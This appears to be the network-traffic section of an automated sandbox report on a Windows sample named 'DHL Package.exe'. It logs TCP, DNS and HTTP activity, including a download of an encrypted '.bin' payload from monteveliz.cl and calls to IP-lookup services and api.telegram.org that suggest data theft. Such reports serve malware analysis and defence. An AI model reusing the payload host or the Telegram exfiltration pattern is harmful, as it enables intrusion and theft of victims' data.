Aug 7, 2024 09:28:16.099585056 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.099663019 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.101520061 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.101629972 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.101753950 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.101814985 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.103854895 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.103955984 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.104074955 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.104156017 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.296833038 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.296960115 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.297044039 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.297113895 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.297183990 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.297239065 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.297239065 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.298986912 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.299124956 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.299185991 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.299392939 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.301111937 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.301239014 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.301322937 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.301399946 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.303320885 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.303452969 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.303528070 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.303601980 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.305530071 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.305658102 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.305691004 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.305852890 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.307606936 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.307729006 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.307862043 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.307939053 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.309863091 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.309989929 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.310050964 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.310139894 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.311894894 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.312041998 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.312149048 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.312236071 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.314049006 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.314160109 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.314321995 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.314321995 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.316211939 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.316325903 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.316478014 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.316536903 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.318648100 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.318826914 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.319051027 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.319284916 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.320828915 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.320951939 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.321182966 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.323163986 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.323292017 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.323420048 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.323482037 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.325375080 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.325433969 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.325568914 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.325613022 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.327363968 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.327419996 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.327683926 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.329545975 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.329603910 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:16.329727888 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:16.329854012 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:17.138060093 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:17.468606949 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:28:17.469197989 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:17.469244957 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:17.799957991 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:28:17.800096035 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:28:17.825790882 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:18.156982899 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:28:18.208910942 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:18.834070921 CEST	49742	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:18.834086895 CEST	443	49742	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:18.834292889 CEST	49742	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:18.847774029 CEST	49742	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:18.847781897 CEST	443	49742	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:19.189946890 CEST	443	49742	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:19.190207005 CEST	49742	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:19.194022894 CEST	49742	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:19.194036007 CEST	443	49742	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:19.194315910 CEST	443	49742	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:19.224113941 CEST	49742	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:19.264255047 CEST	443	49742	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:19.678261042 CEST	443	49742	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:19.678803921 CEST	443	49742	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:19.679069042 CEST	49742	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:19.680444956 CEST	49742	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:19.693484068 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:20.025669098 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:28:20.028445005 CEST	49743	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:20.028532982 CEST	443	49743	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:20.028824091 CEST	49743	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:20.028992891 CEST	49743	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:20.029043913 CEST	443	49743	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:20.067425966 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:20.373759985 CEST	443	49743	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:20.375688076 CEST	49743	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:20.375746965 CEST	443	49743	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:20.751769066 CEST	443	49743	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:20.752448082 CEST	443	49743	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:20.752722979 CEST	49743	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:20.752968073 CEST	49743	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:20.755336046 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:21.081646919 CEST	80	49740	172.93.120.113	192.168.11.20
Aug 7, 2024 09:28:21.081957102 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:28:21.088993073 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:28:21.089637041 CEST	49744	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:21.089723110 CEST	443	49744	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:21.089899063 CEST	49744	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:21.090161085 CEST	49744	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:21.090219021 CEST	443	49744	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:21.129679918 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:21.429179907 CEST	443	49744	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:21.430510044 CEST	49744	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:21.430535078 CEST	443	49744	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:21.807413101 CEST	443	49744	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:21.807964087 CEST	443	49744	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:21.808119059 CEST	49744	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:21.808433056 CEST	49744	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:21.810622931 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:22.142910004 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:28:22.143496037 CEST	49745	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:22.143583059 CEST	443	49745	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:22.143807888 CEST	49745	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:22.144016981 CEST	49745	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:22.144074917 CEST	443	49745	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:22.191951990 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:22.481729031 CEST	443	49745	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:22.483252048 CEST	49745	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:22.483270884 CEST	443	49745	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:22.862370014 CEST	443	49745	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:22.862876892 CEST	443	49745	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:22.863076925 CEST	49745	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:22.863352060 CEST	49745	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:22.865736008 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:23.197529078 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:28:23.198070049 CEST	49746	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:23.198160887 CEST	443	49746	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:23.198395014 CEST	49746	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:23.198617935 CEST	49746	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:23.198662996 CEST	443	49746	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:23.238617897 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:23.542380095 CEST	443	49746	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:23.543744087 CEST	49746	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:23.543807983 CEST	443	49746	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:23.929699898 CEST	443	49746	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:23.930206060 CEST	443	49746	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:23.930397987 CEST	49746	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:23.930632114 CEST	49746	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:23.932697058 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:24.264518023 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:28:24.265100002 CEST	49747	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:24.265197039 CEST	443	49747	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:24.265525103 CEST	49747	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:24.265625954 CEST	49747	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:24.265666008 CEST	443	49747	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:24.316458941 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:24.608098984 CEST	443	49747	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:24.609464884 CEST	49747	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:24.609530926 CEST	443	49747	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:24.986746073 CEST	443	49747	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:24.986881018 CEST	443	49747	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:24.987099886 CEST	49747	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:24.987399101 CEST	49747	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:24.989842892 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:25.339840889 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:28:25.340507984 CEST	49748	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:25.340610981 CEST	443	49748	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:25.340835094 CEST	49748	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:25.341058016 CEST	49748	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:25.341115952 CEST	443	49748	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:25.394376993 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:25.679919958 CEST	443	49748	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:25.681385994 CEST	49748	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:25.681396961 CEST	443	49748	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:26.060417891 CEST	443	49748	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:26.060965061 CEST	443	49748	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:26.061152935 CEST	49748	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:26.061382055 CEST	49748	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:26.063566923 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:26.395008087 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:28:26.395596027 CEST	49749	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:26.395694971 CEST	443	49749	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:26.395822048 CEST	49749	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:26.396017075 CEST	49749	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:26.396061897 CEST	443	49749	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:26.441062927 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:28:26.738612890 CEST	443	49749	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:26.740012884 CEST	49749	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:26.740035057 CEST	443	49749	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:27.118879080 CEST	443	49749	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:27.119385004 CEST	443	49749	172.67.177.134	192.168.11.20
Aug 7, 2024 09:28:27.119570971 CEST	49749	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:27.119846106 CEST	49749	443	192.168.11.20	172.67.177.134
Aug 7, 2024 09:28:33.108700037 CEST	49750	443	192.168.11.20	149.154.167.220
Aug 7, 2024 09:28:33.108720064 CEST	443	49750	149.154.167.220	192.168.11.20
Aug 7, 2024 09:28:33.108921051 CEST	49750	443	192.168.11.20	149.154.167.220
Aug 7, 2024 09:28:33.109215975 CEST	49750	443	192.168.11.20	149.154.167.220
Aug 7, 2024 09:28:33.109225035 CEST	443	49750	149.154.167.220	192.168.11.20
Aug 7, 2024 09:28:33.731827021 CEST	443	49750	149.154.167.220	192.168.11.20
Aug 7, 2024 09:28:33.732369900 CEST	49750	443	192.168.11.20	149.154.167.220
Aug 7, 2024 09:28:33.733712912 CEST	49750	443	192.168.11.20	149.154.167.220
Aug 7, 2024 09:28:33.733722925 CEST	443	49750	149.154.167.220	192.168.11.20
Aug 7, 2024 09:28:33.733966112 CEST	443	49750	149.154.167.220	192.168.11.20
Aug 7, 2024 09:28:33.735198021 CEST	49750	443	192.168.11.20	149.154.167.220
Aug 7, 2024 09:28:33.776223898 CEST	443	49750	149.154.167.220	192.168.11.20
Aug 7, 2024 09:28:33.776504040 CEST	49750	443	192.168.11.20	149.154.167.220
Aug 7, 2024 09:28:33.776519060 CEST	443	49750	149.154.167.220	192.168.11.20
Aug 7, 2024 09:28:34.383605003 CEST	443	49750	149.154.167.220	192.168.11.20
Aug 7, 2024 09:28:34.383707047 CEST	443	49750	149.154.167.220	192.168.11.20
Aug 7, 2024 09:28:34.383927107 CEST	49750	443	192.168.11.20	149.154.167.220
Aug 7, 2024 09:28:34.384448051 CEST	49750	443	192.168.11.20	149.154.167.220
Aug 7, 2024 09:29:31.394629002 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:29:31.394939899 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:30:04.732037067 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:30:05.310066938 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:30:06.419532061 CEST	49741	80	192.168.11.20	132.226.247.73
Aug 7, 2024 09:30:06.450314999 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:30:06.750730038 CEST	80	49741	132.226.247.73	192.168.11.20
Aug 7, 2024 09:30:08.731122971 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:30:13.292529106 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:30:22.415636063 CEST	49740	80	192.168.11.20	172.93.120.113
Aug 7, 2024 09:30:40.661541939 CEST	49740	80	192.168.11.20	172.93.120.113

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 7, 2024 09:28:14.745434046 CEST	60421	53	192.168.11.20	1.1.1.1
Aug 7, 2024 09:28:15.126055002 CEST	53	60421	1.1.1.1	192.168.11.20
Aug 7, 2024 09:28:16.967818022 CEST	63440	53	192.168.11.20	1.1.1.1
Aug 7, 2024 09:28:17.133892059 CEST	53	63440	1.1.1.1	192.168.11.20
Aug 7, 2024 09:28:18.656395912 CEST	65254	53	192.168.11.20	1.1.1.1
Aug 7, 2024 09:28:18.833273888 CEST	53	65254	1.1.1.1	192.168.11.20
Aug 7, 2024 09:28:32.944211006 CEST	51894	53	192.168.11.20	1.1.1.1
Aug 7, 2024 09:28:33.108052015 CEST	53	51894	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 7, 2024 09:28:14.745434046 CEST	192.168.11.20	1.1.1.1	0x4028	Standard query (0)	monteveliz.cl	A (IP address)	IN (0x0001)	false
Aug 7, 2024 09:28:16.967818022 CEST	192.168.11.20	1.1.1.1	0x7b1c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Aug 7, 2024 09:28:18.656395912 CEST	192.168.11.20	1.1.1.1	0x6ae1	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Aug 7, 2024 09:28:32.944211006 CEST	192.168.11.20	1.1.1.1	0x648b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 7, 2024 09:28:15.126055002 CEST	1.1.1.1	192.168.11.20	0x4028	No error (0)	monteveliz.cl		172.93.120.113	A (IP address)	IN (0x0001)	false
Aug 7, 2024 09:28:17.133892059 CEST	1.1.1.1	192.168.11.20	0x7b1c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 7, 2024 09:28:17.133892059 CEST	1.1.1.1	192.168.11.20	0x7b1c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Aug 7, 2024 09:28:17.133892059 CEST	1.1.1.1	192.168.11.20	0x7b1c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Aug 7, 2024 09:28:17.133892059 CEST	1.1.1.1	192.168.11.20	0x7b1c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Aug 7, 2024 09:28:17.133892059 CEST	1.1.1.1	192.168.11.20	0x7b1c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Aug 7, 2024 09:28:17.133892059 CEST	1.1.1.1	192.168.11.20	0x7b1c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Aug 7, 2024 09:28:18.833273888 CEST	1.1.1.1	192.168.11.20	0x6ae1	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Aug 7, 2024 09:28:18.833273888 CEST	1.1.1.1	192.168.11.20	0x6ae1	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Aug 7, 2024 09:28:33.108052015 CEST	1.1.1.1	192.168.11.20	0x648b	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

monteveliz.cl

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49740	172.93.120.113	80	4252	C:\Users\user\Desktop\DHL Package.exe

Timestamp	Bytes transferred	Direction	Data
Aug 7, 2024 09:28:15.363061905 CEST	175	OUT	GET /SjZVauFBbad87.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: monteveliz.cl Cache-Control: no-cache
Aug 7, 2024 09:28:15.598361015 CEST	1289	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:15 GMT Server: Apache Last-Modified: Wed, 07 Aug 2024 00:36:46 GMT Accept-Ranges: bytes Content-Length: 133696 Content-Type: application/octet-stream Data Raw: 1f 99 4e 45 d6 1f 85 60 c9 05 c3 a4 aa b2 09 e2 18 ce e1 55 e3 c2 13 64 1c 37 fa 42 04 72 b5 67 30 c3 be 0a ad 8d 8c 9e 6e ef 54 cd 0d ad c0 39 07 26 00 20 f9 78 f8 bd 16 f0 3b b3 59 fa 12 f1 da 46 cb e9 ed cb a3 27 11 63 72 ed 76 57 12 12 08 5d 00 c0 78 58 89 db 26 cd c0 d6 fe 23 b0 55 32 b0 25 ac fb 1a 75 fe 46 a6 be f3 71 8e 50 11 84 af ba 2a 34 2d f5 09 3a 01 d5 66 f7 b3 29 e8 bd 4a b8 97 1c 38 e6 8c 52 e1 7b 27 86 f8 46 55 a1 06 8b 43 b5 12 2c 45 b7 6f 0a d0 79 21 cc 04 d2 39 34 c1 55 78 fa 11 9e 5b 35 3b 42 be 3d a3 01 ed 1e b9 f1 49 0d 1d 08 38 79 0c 94 dd e2 9b f1 83 c3 60 8b c8 35 6a 37 9a e2 65 f4 ad a4 dd 49 d1 56 13 2f af 36 97 58 a9 78 52 4e 07 96 d7 38 bb dc 1c 42 a5 b8 ab da 9c 3b 9b 72 20 7f e2 1f 37 43 bf cd 24 1d bb fe f3 6f 12 57 ff 50 07 37 0a 81 6b 06 79 f5 b5 cb e2 00 c1 04 c9 f7 80 9d 1f 87 d8 95 3b 30 d6 67 0b 08 8a 63 20 3b 38 5c 81 ae 0f 55 4c 7a 4f 51 a2 ca bc 9f 4e 81 43 7c c6 f0 5a d7 03 5c 71 4d b6 cb bf 6e dc 79 2c c2 43 b6 d6 90 26 7b e0 b6 45 5b 9e 3d ae 0e 73 79 07 [TRUNCATED] Data Ascii: NE`Ud7Brg0nT9& x;YF'crvW]xX&#U2%uFqP4-:f)J8R{'FUC,Eoy!94Ux[5;B=I8y`5j7eIV/6XxRN8B;r 7C$oWP7ky;0gc ;8\ULzOQNC\|Z\qMny,C&{E[=syXolB~lM4%<V8opsu LfVz%A!\|!nq&6l#.fN}BUl,M%w#dmy/O1`rD\|e"z4fMN'(BX\'AS0q %3Ut7?l5a6rA"uGN?b#i\:U+`RsM}~M(dE=9m+U{Y:p\|@VH@FeP:yC\|E=8\|%#7 oDX%p1p++c98! U~B}wQ?G@SwX_<3Bhhjba^h%UA_xFh+Ljcn$WwT[!B)<6\|sxQ'Y2ul7a$,5l7'2`G7~v/$9#ZHe/yLUEfd>07.MRn[!FOs7f\b9WW P-s\#DHoC}' . [TRUNCATED]
Aug 7, 2024 09:28:15.598457098 CEST	1289	IN	Data Raw: 00 dc 1b 54 5e e4 a7 7d 99 45 d6 04 a5 6b 21 0c 9f 7c 35 ee 7e cc 51 29 cc 44 f6 89 43 ec 34 fb fa 72 0a 29 4b 57 9a 65 3a 71 8c b7 89 36 ed b6 e2 d3 dc c2 c0 76 d7 b2 01 ca e7 c7 a3 5c d4 aa 40 71 1c b6 4e d3 a1 34 21 b6 a4 2f a3 9b 7b fe 9e ef Data Ascii: T^}Ek!\|5~Q)DC4r)KWe:q6v\@qN4!/{%`$hHl&9sEHL&YLGWSlB$+Q=I\|`}+anU%6R5).LGkAwiiR'iP>-r
Aug 7, 2024 09:28:15.600583076 CEST	1289	IN	Data Raw: 3a e7 1e fa 5c da 2d 2a b7 26 8c f8 1e 92 90 1d 0a 03 67 80 b2 44 12 80 fe 8e 53 dc f1 90 ff 40 e2 89 ed c0 2f 70 31 43 9d f8 2b d4 01 8f 12 fc 62 39 33 28 81 7f bc bd 21 0f fd 76 c8 55 7e 80 48 56 bb f7 a3 8a a9 95 d8 13 4c 15 9a ae 37 28 40 86 Data Ascii: :\-&gDS@/p1C+b93(!vU~HVL7(@!CwEU_Ljy/3BhhLDXk/J&zL@?aL08n^WwU!B%rJp\|%p(J}'\FTuB.qy(`AbruCKq
